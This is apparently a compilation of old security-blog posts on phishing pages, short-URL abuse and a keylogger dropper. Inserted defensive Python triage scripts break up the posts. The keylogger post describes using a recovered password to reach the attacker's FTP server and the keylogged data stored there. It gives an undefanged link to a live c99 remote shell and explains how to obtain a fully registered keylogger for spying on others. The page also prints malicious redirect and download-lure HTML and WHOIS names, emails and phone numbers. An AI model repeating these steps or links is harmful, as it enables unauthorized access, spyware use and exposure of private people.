Phish With attachment

Here is what we identified.


A phishing mail with an attached HTML file disguised as a PDF, which has the following link inside:


Multiple levels of redirection are used.


But OpenDNS blocked it with its blacklisting database.


OpenDNS provides a good level of protection from fake and malware sites.

Here is information on how to use this service:

https://store.opendns.com/setup/router/

Posted in Uncategorized

Bit.ly Targeted with bank Phishing

We have seen the security features of bit.ly and its increased use as a short URL service; now it has been exploited to send bank phishing emails.


Here is the link:

hxxp://bit.ly/czFcBc

with the following content:

Security Alert:

Dear Valued Customer
Your Account has generated an error code on our Account Maintainance Server.
As an additional security measure, you are required to follow the security link below to
avoid such occurence in the future.
Please follow the link below to resolve this problem:

This link redirects to a hacked site:

hxxp://75.125.175.170/~makiasan/case/site.php


which then redirects with a 302 code to the following link hosting the phishing pages:

hxxp://pasteups.com/Help/Common%20Wealth/icici/onlineverification.do/indexx.html

Posted in Uncategorized

Hack the Malware == Access of all keylogged data + Fully registered keylogger software

Usually I search Google for malware/hack tools left behind by malware authors, defacers, etc. I saw a website containing some executable files which looked suspicious to me. Firstly, they had a double extension like .jpg.exe, and secondly there was the well-known remote shell c99.php. This file is not working on that server, but it is sure that the bad guy has put other malware/hack related files there.

Now it could be either a hacked website or his own site for keeping some stuff. I got the WHOIS information:

canonical name: cvak36a1.com.

aliases:

addresses: 64.136.20.52

Domain Whois record

Queried whois.internic.net with "dom cvak36a1.com"…

   Domain Name: CVAK36A1.COM

   Registrar: MELBOURNE IT, LTD. D/B/A INTERNET NAMES WORLDWIDE

   Whois Server: whois.melbourneit.com

   Referral URL: http://www.melbourneit.com

   Name Server: NS1.SJ1.NORTHSKY.COM

   Name Server: NS2.SJ1.NORTHSKY.COM

   Status: ok

   Updated Date: 21-may-2009

   Creation Date: 21-may-2009

   Expiration Date: 21-may-2010

Domain Name………. cvak36a1.com

  Creation Date…….. 2009-05-21

  Registration Date…. 2009-05-21

Expiry Date………. 2010-05-21

Organisation Name…. Mike Koehler

  Organisation Address. 3061 County Road 220

  Organisation Address.

  Organisation Address. Findlay

  Organisation Address. 45840

  Organisation Address. OH

Organisation Address. UNITED STATES

Admin Name……….. Dung Le

  Admin Address…….. ThaiNguyen VietNam

  Admin Address……..

  Admin Address…….. Thai Nguyen

  Admin Address…….. 23999

  Admin Address…….. Thai Nguyen

Admin Address…….. VIET NAM

Admin Email………. dunggttn2009@gmail.com ——>>>>>> Note this ID

  Admin Phone………. +84985081369

  Admin Fax…………

Tech Name………… Mike Koehler

  Tech Address……… 3061 County Road 220

  Tech Address………

  Tech Address……… Findlay

  Tech Address……… 45840

  Tech Address……… OH

  Tech Address……… UNITED STATES

Tech Email……….. dunggttn2009@gmail.com

  Tech Phone……….. 4192993235

  Tech Fax………….

  Name Server………. ns1.sj1.northsky.com

  Name Server………. ns2.sj1.northsky.com

By looking at and analyzing some other stuff I concluded that the Vietnamese guy owns this website. There is also SQL injection related stuff at:

http://cvak36a1.com/3/

http://cvak36a1.com/2/

I downloaded the following latest files from this site:

File: anhdep.jpg.exe

Size: 298042 Bytes

MD5:  748128B6B977D352E4EC412C4E303050

File: mu.jpg.exe

Size: 247353 Bytes

MD5:  9297D8E7BB3B5E78968A9C96544E8558

My first step in analysis is to look at the file strings, as they reveal a lot of information about the file in question. In the case of this file, anhdep.jpg.exe, the strings are:

!This program cannot be run in DOS mode.

Rich

.text

`.data

.rsrc ———————————–->> Resource section (may contain other files if it is a dropper kind of malware)

MSVBVM60.DLL ——————->> The presence of this DLL indicates that this is probably written in VB (in 99% of files)

@*\AC:\Documents and Settings\Admin\My Documents\New Folder\stub\stub.vbp   –> A stub added to a file indicates a packer, binder or keylogger

.exe

\decrypted.exe   ————————>> Original file name is Intel.exe and having this decrypted.exe !!

VS_VERSION_INFO

StringFileInfo

040904B0

ProductName


intel
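The strings listed above are exactly the kind of artefacts a quick triage script can pull out and tag automatically, so that a double extension, the VB6 runtime import, a leftover .vbp project path or a known keylogger component name is flagged before anyone runs the sample. The following is an added example written for this page, not the blogger's tooling (the post used a strings utility and PEiD); the byte sample is a constructed stand-in for anhdep.jpg.exe built from the strings the post lists, and the indicator list is a hypothetical triage heuristic.

```python
"""Minimal ``strings`` with indicator tagging for triage of a suspicious PE.

Added example for this page, not the author's tooling. SAMPLE_BINARY is a
constructed stand-in for anhdep.jpg.exe; INDICATORS is a hypothetical heuristic.
"""
import re
from typing import Dict, List

# Constructed sample: a few ASCII strings and one UTF-16LE string among junk bytes.
SAMPLE_BINARY = (
    b"MZ\x90\x00\x03\x00\x00\x00"
    b"!This program cannot be run in DOS mode.\x00\x00"
    b"\x8b\x01\x04\x00Rich\x00\x00.text\x00\x00.rsrc\x00\x00"
    b"MSVBVM60.DLL\x00\x00"
    b"@*\\AC:\\Documents and Settings\\Admin\\stub\\stub.vbp\x00"
    b"\\decrypted.exe\x00"
    b"bpkhk.dll\x00\x02\x7f"
    + "anhdep.jpg.exe".encode("utf-16-le") + b"\x00\x00"
)

# (tag, pattern applied with re.search to every extracted string)
INDICATORS = [
    ("vb6-runtime", re.compile(r"MSVBVM60\.DLL", re.I)),
    ("vb-project-path", re.compile(r"\\[^\\]+\.vbp$", re.I)),
    ("double-extension", re.compile(r"\.(?:jpe?g|png|gif|pdf|doc)\.(?:exe|scr|com)$", re.I)),
    ("embedded-exe-name", re.compile(r"(?:^|\\)[\w.-]+\.exe$", re.I)),
    ("perfect-keylogger-component", re.compile(r"^bpk(?:hk|wb|r)?\.(?:exe|dll|dat)$", re.I)),
]


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Return printable ASCII runs and UTF-16LE runs of at least min_len chars."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [m.group().decode("ascii") for m in ascii_re.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in wide_re.finditer(data)]
    return found


def tag_indicators(strings: List[str]) -> Dict[str, List[str]]:
    """Map each indicator tag to the strings that triggered it."""
    tags: Dict[str, List[str]] = {}
    for s in strings:
        for tag, rx in INDICATORS:
            if rx.search(s):
                tags.setdefault(tag, []).append(s)
    return tags


def triage(data: bytes) -> Dict[str, List[str]]:
    return tag_indicators(extract_strings(data))


if __name__ == "__main__":
    for tag, hits in triage(SAMPLE_BINARY).items():
        print(f"{tag:28s} {hits}")
```

The UTF-16 pass matters for Windows samples: resource-section names and version info (ProductName, OriginalFilename) are stored wide, so an ASCII-only strings run misses them.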

Signature analysis with PEiD

My local AV is detecting this malware as “Trojan.Dropper.WIN32.VB.acjs”. I got some clue from this name: so it is a dropper file written in VB. I executed this file in my lab machine. Like other malware it drops some files into the TEMP directory, from where it displays one image file and simultaneously executes the other, the (decrypted.exe) keylogger server file, resulting in bpk.exe and other files in the system32 folder, a registry “RUN” modification, and a Browser Helper Object setting for bpkwb.dll.

Image on execution

bpk.exe is well known as the “Blazing Tools Perfect Keylogger” software. So anhdep.jpg.exe is the result of binding an image file and the keylogger file. I scanned the dropped files with the same AV and, to my surprise, it is not detecting any of the keylogger files. This particular file is storing all information in the system32/dt folder as snapshot images, meaning at regular intervals it is taking snapshots of the screen as well. It also has some network activity, i.e. it is trying to reach 69.89.30.141. So my AV has detection for the binder tool, not the keylogger. I was also thinking of code analysis using VB Decompiler or OllyDbg; however, I moved on to the other file.

File: mu.jpg.exe

This file does not have the VB signature, but I found names related to the same keylogger as in the previous file:

inst.dat$   ———————->>>Installation Instructions

u:}T

Q"UT

YZU-MH

~EO’

=v;y

gSRk

qd{F

-t8F

mc.dat     ————->> Some info (later I found it is the “Mouse Click config” file)

bpkhk.dll    ————>> Blazing Tools Perfect Keylogger hook DLL file

cvk_

O}KwRl

_{cq

So this file is also dropping the same keylogger but using a different crypter/binder, and to my surprise my AV is not detecting it at all!!

Again I executed this file in my lab machine and found the same results, but with a different image and different configuration files (related to the same keylogger), pointing to the same IP 69.89.30.141. None of the files related to the keylogger are detected by my AV. This time the image is:

Image

So before doing code analysis of bpk.exe or bpkhk.dll, I decided to find out how user data is uploaded to the remote location. You know, this is the very interesting part, and I love to say that finally I got access to the remote server and a fully registered Blazing Tools Perfect Keylogger as well!!

Most keyloggers have some configuration wizard to create the remote server files. So I checked their default configuration and found the hot key to show/hide the program icon.

So I pressed Ctrl+Alt+L and it showed a popup for a password.

This password is the key of all locks.

How to crack this password ?

Crack the software or analyze network traffic to see uploading of keylogged data?

There are other options as well, from code analysis to simple analysis of network traffic. Code analysis would be complex and is useful when all the keylogger configuration is embedded in the same file, but in some cases they store the configuration (like password, delivery method, etc.) in separate files or in the registry. Network traffic will definitely give useful information, but not the password required to unlock this keylogger. So I decided to analyze the other supporting files and the registry.

These are the registry modifications:

HKEY_CLASSES_ROOT\PK.IE "(Default)"

Type: REG_SZ

Data: IE Class

HKEY_CLASSES_ROOT\PK.IE\CLSID "(Default)"

Type: REG_SZ

Data: {1E1B2879-88FF-11D3-8D96-D7ACAC95951A}

HKEY_CLASSES_ROOT\PK.IE\CurVer "(Default)"

Type: REG_SZ

Data: PK.IE.1

HKEY_CLASSES_ROOT\PK.IE.1 "(Default)"

Type: REG_SZ

Data: IE Plugin Class

HKEY_CLASSES_ROOT\PK.IE.1\CLSID "(Default)"

Type: REG_SZ

Data: {1E1B2879-88FF-11D3-8D96-D7ACAC95951A}

HKEY_CLASSES_ROOT\TypeLib\{1E1B286C-88FF-11D3-8D96-D7ACAC95951A}\1.0 "(Default)"

Type: REG_SZ

Data: BPK IE Plugin Type Library

HKEY_CLASSES_ROOT\TypeLib\{1E1B286C-88FF-11D3-8D96-D7ACAC95951A}\1.0\0\win32 "(Default)"

Type: REG_SZ

Data: C:\WINDOWS\system32\bpkwb.dll

HKEY_CLASSES_ROOT\TypeLib\{1E1B286C-88FF-11D3-8D96-D7ACAC95951A}\1.0\FLAGS "(Default)"

Type: REG_SZ

Data: 0

HKEY_CLASSES_ROOT\TypeLib\{1E1B286C-88FF-11D3-8D96-D7ACAC95951A}\1.0\HELPDIR "(Default)"

Type: REG_SZ

Data: C:\WINDOWS\system32\

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1E1B2879-88FF-11D3-8D96-D7ACAC95951A} "(Default)"

Type: REG_SZ

Data: PK IE Plugin

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "bpk"

Type: REG_SZ

Data: C:\WINDOWS\system32\bpk.exe
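A registry diff like the one above is where the persistence story is: the Run value gives the autostart, the Browser Helper Objects entry gives the in-browser hook, and the CLSID/TypeLib entries tie a GUID to the DLL on disk. The script below is an added example written for this page, not the blogger's tooling: it parses that three-line-per-entry report format, flags the persistence mechanisms, and collects the file paths and GUIDs worth pivoting on. The report text is a subset of the entries listed above; the category names are a hypothetical triage scheme.

```python
"""Parse a sandbox-style registry change report and flag persistence.

Added example for this page, not the author's tooling. REPORT is a subset of
the registry modifications listed in the post; the categories are invented.
"""
import re
from typing import Dict, List, Tuple

REPORT = r"""
HKEY_CLASSES_ROOT\PK.IE.1\CLSID "(Default)"
Type: REG_SZ
Data: {1E1B2879-88FF-11D3-8D96-D7ACAC95951A}
HKEY_CLASSES_ROOT\TypeLib\{1E1B286C-88FF-11D3-8D96-D7ACAC95951A}\1.0\0\win32 "(Default)"
Type: REG_SZ
Data: C:\WINDOWS\system32\bpkwb.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1E1B2879-88FF-11D3-8D96-D7ACAC95951A} "(Default)"
Type: REG_SZ
Data: PK IE Plugin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "bpk"
Type: REG_SZ
Data: C:\WINDOWS\system32\bpk.exe
"""

KEY_RE = re.compile(r'^(HKEY_[^"]+?)\s+"([^"]*)"\s*$')   # key path + quoted value name
PATH_RE = re.compile(r'[A-Za-z]:\\[^\s"]+')               # drive-letter file paths
GUID_RE = re.compile(r"\{[0-9A-Fa-f-]{36}\}")

Finding = Tuple[str, str, str]  # (category, key, data)


def parse_report(text: str) -> List[Dict[str, str]]:
    """Group 'KEY "name"' / 'Type:' / 'Data:' lines into entries."""
    entries: List[Dict[str, str]] = []
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            entries.append({"key": m.group(1), "name": m.group(2), "type": "", "data": ""})
        elif line.startswith("Type:") and entries:
            entries[-1]["type"] = line[5:].strip()
        elif line.startswith("Data:") and entries:
            entries[-1]["data"] = line[5:].strip()
    return entries


def classify(entry: Dict[str, str]) -> List[str]:
    """Persistence categories that apply to one registry entry."""
    key = entry["key"].lower()
    cats = []
    if re.search(r"\\currentversion\\run(?:once)?$", key):
        cats.append("autorun")
    if "\\browser helper objects\\" in key:
        cats.append("browser-helper-object")
    if key.startswith("hkey_classes_root\\") and (key.endswith("\\clsid") or "\\typelib\\" in key):
        cats.append("com-registration")
    return cats


def findings(text: str) -> Tuple[List[Finding], List[str], List[str]]:
    """Return (flagged entries, referenced file paths, GUIDs seen)."""
    flagged: List[Finding] = []
    paths, guids = set(), set()
    for e in parse_report(text):
        for cat in classify(e):
            flagged.append((cat, e["key"], e["data"]))
        paths.update(PATH_RE.findall(e["data"]))
        guids.update(GUID_RE.findall(e["key"] + " " + e["data"]))
    return flagged, sorted(paths), sorted(guids)


if __name__ == "__main__":
    flagged, paths, guids = findings(REPORT)
    for cat, key, data in flagged:
        print(f"[{cat}] {key} -> {data}")
    print("files:", paths)
    print("guids:", guids)
```

The same three categories are what a host-based check should enumerate on a live machine: the Run/RunOnce values, the Browser Helper Objects list, and any CLSID whose server DLL sits in a writable or unexpected location.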

and these are the file modifications:

Files Added:

c:\WINDOWS\system32\bpk.dat (186 bytes)

c:\WINDOWS\system32\bpk.exe (405,504 bytes)

c:\WINDOWS\system32\bpkhk.dll (24,576 bytes)

c:\WINDOWS\system32\bpkr.exe (7,680 bytes)

c:\WINDOWS\system32\bpkwb.dll (40,960 bytes)

c:\WINDOWS\system32\inst.dat (996 bytes)

c:\WINDOWS\system32\mc.dat (82 bytes)

c:\WINDOWS\system32\pk.bin (3,944 bytes)

So, other than the executable files, I tried to read the other dat and bin files.

Look at the following strings:

File: mc.dat—————>>>>>>>>>>>>>>>>>>>>>>>>>> This file has some keywords to trigger some action!!

MD5:  abe8b9f8f0419682b947c95fac3808c0

Size: 82

Ascii Strings:

—————————————————————————

con duong to lua

gunbound

dot kich

crossfire

vo lam truyen ky

kiem the

________________________________________________________________________________

File: inst.dat ———–>>>>>>>>>>>>>>>>>>>>>>>>> Best name to guess is “Installation config”.

MD5:  958302daa5e4fcd93fba2964eec66906

Size: 996

Ascii Strings:

—————————————————————————

Type folder path here or click "Next" to install to "System" folder

http://

bpk.exe

bpkr.exe

bpkhk.dll

wbpkwb.dll

pk.bin

c?wapps.dat

^?w8K

titles.dat

mc.dat

winst.dat

wkw.dat

mu.jpg

f?wB

_________________________________________________________________________________

File: bpk.dat————>>>>>>>>>>>>>>>>>>>>>>>>>>>>NO visible strings !!

MD5:  6945c380c6514e1bd2a5ee7a5813a298

Size: 664 Bytes

Ascii Strings:

—————————————————————————

___________________________________________________________________________________

File: pk.bin ———–>>>>>>>>>>>>>>>>>>>>>>>>>>>>> NO visible strings  !! size ~ 4 KB

MD5:  e5deabf400692fed8394bf3fdd756f2e

Size: 3944 Bytes

Ascii Strings:

—————————————————————————

Unicode Strings:

—————————————————————————

The files bpk.dat and pk.bin do not have any readable strings, so I analyzed them with a hex editor.

XORing this file with some byte gives a pattern that you can use to decode it fully.

I also XORed the other file, pk.bin, in the hex editor.

So after doing Hex analysis of both files I found the password to unlock this keylogger installed on my Lab Machine !
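The hex-editor XOR trick above generalizes to a small script: try every single-byte key, keep the candidates that decode to printable text, and prefer the one whose output has the structure you expect (here, key=value lines), or shortcut with a known plaintext crib such as a field name you expect in the file. The block below is an added example written for this page, not the blogger's method; SAMPLE_CONFIG is a constructed stand-in for an opaque file like bpk.dat, and the 0x5A key and the field names are invented. It also goes slightly beyond the post by handling the ambiguity a pure "printable ratio" score leaves (several keys can yield all-printable output), which is why the config-structure check is the primary ranking.

```python
"""Single-byte XOR recovery for an opaque malware config/data file.

Added example for this page, not the author's method. SAMPLE_CONFIG is a
constructed stand-in for a file like bpk.dat; key 0x5A and the fields are invented.
"""
import re
from typing import List, Optional, Tuple

# Constructed plaintext modelled on a delivery configuration (hypothetical fields).
PLAINTEXT = (
    b"delivery=ftp\r\nhost=203.0.113.9\r\nuser=uploader\r\n"
    b"interval_min=30\r\nscreenshots=1\r\n"
)
SAMPLE_KEY = 0x5A
SAMPLE_CONFIG = bytes(b ^ SAMPLE_KEY for b in PLAINTEXT)  # the "opaque" file

PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}
CONFIG_LINE = re.compile(rb"^[A-Za-z_][A-Za-z0-9_]*=.*$")


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII or tab/CR/LF."""
    if not data:
        return 0.0
    return sum(b in PRINTABLE for b in data) / len(data)


def looks_like_config(data: bytes) -> bool:
    """True when every non-empty line has the shape name=value."""
    lines = [ln for ln in data.splitlines() if ln]
    return bool(lines) and all(CONFIG_LINE.match(ln) for ln in lines)


def rank_keys(data: bytes, top: int = 3) -> List[Tuple[int, bytes]]:
    """Try keys 1..255; rank by structure first, then by how text-like the output is."""
    scored = []
    for key in range(1, 256):
        out = xor_bytes(data, key)
        scored.append((looks_like_config(out), printable_ratio(out), key, out))
    scored.sort(key=lambda t: (t[0], t[1]), reverse=True)
    return [(key, out) for _, _, key, out in scored[:top]]


def key_from_crib(data: bytes, crib: bytes) -> Optional[int]:
    """Known-plaintext shortcut: the first key that makes `crib` appear, if any."""
    for key in range(1, 256):
        if crib in xor_bytes(data, key):
            return key
    return None


if __name__ == "__main__":
    best_key, decoded = rank_keys(SAMPLE_CONFIG)[0]
    print(f"best key: 0x{best_key:02x}")
    print(decoded.decode("ascii", errors="replace"))
    print("crib 'host=' gives key:", key_from_crib(SAMPLE_CONFIG, b"host="))
```

For a multi-byte repeating key the same idea applies per key position (split the file into key-length interleaved slices and solve each slice as a single-byte problem); the ranking function above works unchanged on each slice.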

Press Ctrl+Alt+L

type that password

and after OK you’ll see an icon on the right side in the system tray. Right click –> Options.


Now you can see the delivery configuration for this particular file.

You can also view the FTP server IP where it is uploading the keylogged data, along with the server login credentials! At the time of analysis it is still active.

While looking at the keylogged data on the server I noticed that their own machines are also infected with this keylogger (maybe for test purposes). I got the domain name for this IP and the infamous remote shell c99.php:

canonical name: congtinhocvn.com.

aliases:

addresses: 69.89.30.141

Domain Whois record

Queried whois.melbourneit.com with "congtinhocvn.com"…

Domain Name………. congtinhocvn.com

  Creation Date…….. 2009-06-26

  Registration Date…. 2009-06-26

  Expiry Date………. 2011-06-26

  Organisation Name…. Steven Witt

  Organisation Address. TN citi

  Organisation Address.

  Organisation Address. TN citi

  Organisation Address. 23000

  Organisation Address. TN

Organisation Address. VIET NAM

Admin Name……….. Dung Le Trung

  Admin Address…….. TN citi

  Admin Address……..

  Admin Address…….. TN citi

  Admin Address…….. 23000

  Admin Address…….. TN

Admin Address…….. VIET NAM

  Admin Email………. adamgravesusa@yahoo.com

  Admin Phone………. 8059182572

  Admin Fax…………

You can access that site using (use at your own risk!):

http://congtinhocvn.com/c99.php

If you want to remove the infection from your machine, just uncheck “Enable Logging”, and now you can also create a remote keylogger using this fully registered software.

But what if you want to register it manually?

Here is the solution: the registration keys are also present in the above mentioned files.

So put all these files into one folder:

bpk.exe

bpkhk.dll

bpkwb.dll

On execution of bpk.exe it’ll ask for the registration code. Enter the required name and code.

Now you have the fully registered, undetected Blazing Tools Perfect Keylogger. (Note the user name.)

PDF Download : http://rapidshare.com/files/345876715/HackMalware.pdf.html

– By ZinX

http://www.annysoft.com

Posted in Uncategorized

Orkut Phishing ….

Here is an Orkut phishing victim


This leads to the following page, hosted on a free web service:


It gets the user information and redirects to the Orkut login page, but the information goes to the following guy:


Posted in phishing

Online Phishing by Exploiting

Most of these phishing pages are hosted on hacked servers, and the data is sent to public domains like free email and other services.

Here is the mail that takes us to the phishing page:


Here is the file hosted on the server:


This server was hacked as it is using outdated software:


with POC code:

http://www.milw0rm.com/exploits/9556

Posted in phishing

Phishing using Form Buddy !

The last phishing page reported on Punjab National Bank uses the “Form Buddy” service to capture the information and redirect back to the original bank site. Here is the info found in the pages:

<form action="http://www.formbuddy.com/cgi-bin/form.pl" method="post">
<input type="hidden" name="username" value="tundehsbcxxxxxx">
<input type="hidden" name="reqd" value="0">
<input type="hidden" name="url" value="http://www.pnbindia.com"> 

It has been reported to Form Buddy.

Posted in phishing

More Phishing ……….

We had a couple of phishing incidents reported today; here they are:

hxxp://searchindiaonline.com/bank-india/ing/INGBanner.html – ING phishing

directs to


hxxp://netpnbsecuritysystem.t35.com/netpnb/ – PNB bank

site loaded by the above link


Posted in phishing

Short URL – Security

We have seen how a short URL service can be exploited by malware; now this can be made secure by verifying the final URL against a service like StopBadware.

And we have seen in real time that it is effective against malware exploitation, and this should be implemented in all similar services to make the web experience safer.
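The check described here, resolving a short link to its final destination and vetting it before the user ever lands there, is the same one that would have caught the earlier posts on this page: the HTML-attachment phish that bounced through several redirects, and the bit.ly bank phish that went short link -> hacked host -> 302 -> phishing page. The tracer below is an added example written for this page, not the blog's or any URL service's code. It follows the chain one hop at a time, refuses to even request a host that is on the blocklist, and detects loops. The fetch function, the response table and the hostnames are all constructed; a real tracer would issue HEAD requests with automatic redirects disabled and consult a live reputation feed such as StopBadware or OpenDNS in place of BLOCKLIST.

```python
"""Follow an HTTP redirect chain hop by hop, checking each host against a blocklist.

Added example for this page, not the blog's or any service's code. fake_fetch,
FAKE_RESPONSES and BLOCKLIST are constructed stand-ins for real HTTP and a
real reputation feed.
"""
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Set, Tuple
from urllib.parse import urljoin, urlsplit

REDIRECT_CODES = {301, 302, 303, 307, 308}

# Constructed reputation list (hostnames or IPs known to host phishing/malware).
BLOCKLIST: Set[str] = {"paste-host.example", "198.51.100.13"}

# Constructed responses keyed by URL: (status, Location header or None).
FAKE_RESPONSES: Dict[str, Tuple[int, Optional[str]]] = {
    "http://short.example/czFcBc": (301, "http://203.0.113.7/~user/case/site.php"),
    "http://203.0.113.7/~user/case/site.php": (302, "http://paste-host.example/icici/index.html"),
    "http://paste-host.example/icici/index.html": (200, None),
    "http://short.example/ok": (301, "http://news.example/story"),
    "http://news.example/story": (200, None),
    "http://loop.example/a": (302, "/b"),
    "http://loop.example/b": (302, "/a"),
}


def fake_fetch(url: str) -> Tuple[int, Optional[str]]:
    """Stand-in for a HEAD request with redirects disabled."""
    return FAKE_RESPONSES.get(url, (404, None))


@dataclass
class Hop:
    url: str
    status: Optional[int]   # None when the hop was blocked before any request was made
    blocked: bool


@dataclass
class Trace:
    hops: List[Hop] = field(default_factory=list)
    verdict: str = "allow"  # allow | block | loop | too-many-hops
    final_url: Optional[str] = None


def trace(url: str,
          fetch: Callable[[str], Tuple[int, Optional[str]]] = fake_fetch,
          blocklist: Set[str] = BLOCKLIST,
          max_hops: int = 10) -> Trace:
    """Walk redirects from `url`, stopping at the first blocklisted host."""
    result = Trace()
    seen: Set[str] = set()
    current = url
    for _ in range(max_hops):
        if current in seen:
            result.verdict = "loop"
            return result
        seen.add(current)
        host = (urlsplit(current).hostname or "").lower()
        if host in blocklist:
            # Never contact a known-bad host; record it and stop.
            result.hops.append(Hop(current, None, True))
            result.verdict = "block"
            return result
        status, location = fetch(current)
        result.hops.append(Hop(current, status, False))
        if status in REDIRECT_CODES and location:
            current = urljoin(current, location)  # Location may be relative
            continue
        result.final_url = current
        return result
    result.verdict = "too-many-hops"
    return result


if __name__ == "__main__":
    for start in ("http://short.example/czFcBc", "http://short.example/ok", "http://loop.example/a"):
        t = trace(start)
        print(start, "->", t.verdict, [(h.url, h.status) for h in t.hops])
```

Checking every intermediate host, not only the final one, is deliberate: in the bit.ly case the hacked intermediary was the part already known to be compromised, and a service that only vets the landing page would have missed it.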


Posted in news & alert

Short Way 2 Malware

Short URL services have been exploited for spreading malware for a long time; here is one example:

Hi! Please look at this short video. What are they doing?
tube23441.notlong.com/


This message is posted to a Google group; the link redirects to

eusebiotanis.150m.com – this is again a free hosting page:

<script>
window.location.href=("hxxp://flashtubes.net/xplay.php?id=45230");
</script>

This loads the following malware:

<CENTER><A href="hxxp://freefilesarchive.com/flash-HQ-plugin.45230.exe">
<IMG onmouseover="window.status = 'Download Streaming Player Media please!';"
     alt="You must Download and Run Video Controller Object to play this video file."
     src="img/xplayer.gif" border=0></A>
</CENTER></DIV>
Short URLs can lead to malware sites, so beware if you click one.
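The two page fragments above (here and in the Form Buddy post) are textbook examples of what a static scan of a landing page can flag without executing anything: a script-only redirect to another domain, a link that hands out an .exe dressed up as a media plug-in, and a form that posts the victim's data to a third-party form service and then bounces them back to the real bank site via a hidden url field. The scanner below is an added example written for this page, not the blog's tooling; both sample pages are constructed with reserved example hostnames, and the heuristic names are invented. Defanged hxxp:// links as quoted in the posts would need to be refanged to http:// before scanning.

```python
"""Static scan of a fetched page for phishing/malware delivery patterns.

Added example for this page, not the blog's tooling. FORM_PAGE and
REDIRECT_PAGE are constructed samples; the finding names are invented.
"""
import re
from html.parser import HTMLParser
from typing import List, Optional, Tuple
from urllib.parse import urljoin, urlsplit

SCRIPT_REDIRECT = re.compile(
    r"""(?:window\.location(?:\.href)?|location\.href|location\.replace)\s*[=(]\s*\(?\s*["']([^"']+)["']""",
    re.I)
EXECUTABLE = re.compile(r"\.(?:exe|scr|com|pif|bat|msi)$", re.I)

Finding = Tuple[str, str]  # (category, detail)


class PageScanner(HTMLParser):
    def __init__(self, page_url: str):
        super().__init__()
        self.page_url = page_url
        self.page_host = (urlsplit(page_url).hostname or "").lower()
        self.findings: List[Finding] = []
        self._form: Optional[dict] = None
        self._in_script = False

    @staticmethod
    def _host(url: str) -> str:
        return (urlsplit(url).hostname or "").lower()

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": urljoin(self.page_url, a.get("action", "")), "hidden": {}}
        elif tag == "input" and self._form is not None and a.get("type", "").lower() == "hidden":
            self._form["hidden"][a.get("name", "")] = a.get("value", "")
        elif tag == "a":
            href = urljoin(self.page_url, a.get("href", ""))
            if EXECUTABLE.search(urlsplit(href).path):
                self.findings.append(("executable-download-link", href))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
        elif tag == "form" and self._form is not None:
            form, self._form = self._form, None
            action_host = self._host(form["action"])
            if action_host and action_host != self.page_host:
                self.findings.append(("form-posts-offsite", form["action"]))
            for name, value in form["hidden"].items():
                # A hidden absolute URL on a third domain is the classic "post, then bounce back" pattern.
                if value.lower().startswith(("http://", "https://")) and \
                        self._host(value) not in (self.page_host, action_host):
                    self.findings.append(("hidden-redirect-after-submit", f"{name}={value}"))

    def handle_data(self, data):
        if self._in_script:
            for m in SCRIPT_REDIRECT.finditer(data):
                target = urljoin(self.page_url, m.group(1))
                if self._host(target) != self.page_host:
                    self.findings.append(("script-redirect-offsite", target))


def scan_page(page_url: str, html: str) -> List[Finding]:
    scanner = PageScanner(page_url)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample modelled on the Form Buddy phish (a fake bank login page).
FORM_PAGE_URL = "http://secure-update.example/pnb/index.html"
FORM_PAGE = """<html><body>
<form action="http://formservice.example/cgi-bin/form.pl" method="post">
<input type="hidden" name="username" value="collector-account">
<input type="hidden" name="reqd" value="0">
<input type="hidden" name="url" value="http://www.bank.example">
User ID <input name="uid"> Password <input type="password" name="pwd">
<input type="submit" value="Login"></form></body></html>"""

# Constructed sample modelled on the free-hosting redirect page above.
REDIRECT_PAGE_URL = "http://freehost.example/user/page.html"
REDIRECT_PAGE = """<html><head><script>
window.location.href=("http://videos.example/xplay.php?id=45230");
</script></head><body>
<center><a href="http://files.example/flash-HQ-plugin.45230.exe"><img src="img/xplayer.gif"
alt="You must download and run the player to view this video."></a></center>
</body></html>"""

if __name__ == "__main__":
    for url, html in ((FORM_PAGE_URL, FORM_PAGE), (REDIRECT_PAGE_URL, REDIRECT_PAGE)):
        print(url)
        for cat, detail in scan_page(url, html):
            print("  ", cat, "->", detail)
```

None of these findings is proof on its own (plenty of legitimate sites post forms to a SaaS backend), but two or more on a page that also imitates a bank or social network brand is a strong signal, and the hidden redirect target tells you which brand is being impersonated.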
WHOIS information shows:

Registrant:
    N/A
    Farah F Jones

    2733 Canis Heights Drive
    City Of Commerce
    California,90040

Posted in malware

Fake – New Orkut

With every new release there is a matching release of a fake to steal user information. Here it is for the new Orkut.

Users would receive a spam mail with an invitation to join the new Orkut,


but the link points to:

orkutnew.ning.com/?xgi=31XH2qxBierBjA&xg_source=msg_invite_net

The site gets the user's Orkut profile information;


this is a site hosted on the Ning service with malicious intent.

Posted in phishing